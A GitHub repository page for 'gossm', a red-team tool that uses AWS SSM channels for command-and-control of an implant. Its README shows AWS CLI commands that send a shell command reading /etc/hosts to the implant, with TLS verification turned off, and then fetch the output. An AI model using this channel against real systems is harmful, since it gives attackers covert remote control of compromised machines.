Skip to content

grines/gossm

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

gossm

Abuses AWS SSM Channels for C2 communication. Project is not maintained and was used during a red team op.

Setup

export GO111MODULE=off

go get ./..

go run main.go

send command to implant

aws --no-verify-ssl ssm send-command
--instance-ids "mi-0d416eb76fdc3f731"
--document-name "AWS-RunShellScript"
--comment "cat"
--parameters commands="cat /etc/hosts"
--output text --profile sliver --region us-east-1

get command output

aws ssm get-command-invocation \ 130 ↵ --command-id "8c4a6c6e-236e-416b-8b77-d9b3a0e73c8f"
--instance-id "mi-0d416eb76fdc3f731" --profile sliver --region us-east-1 --no-verify-ssl

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages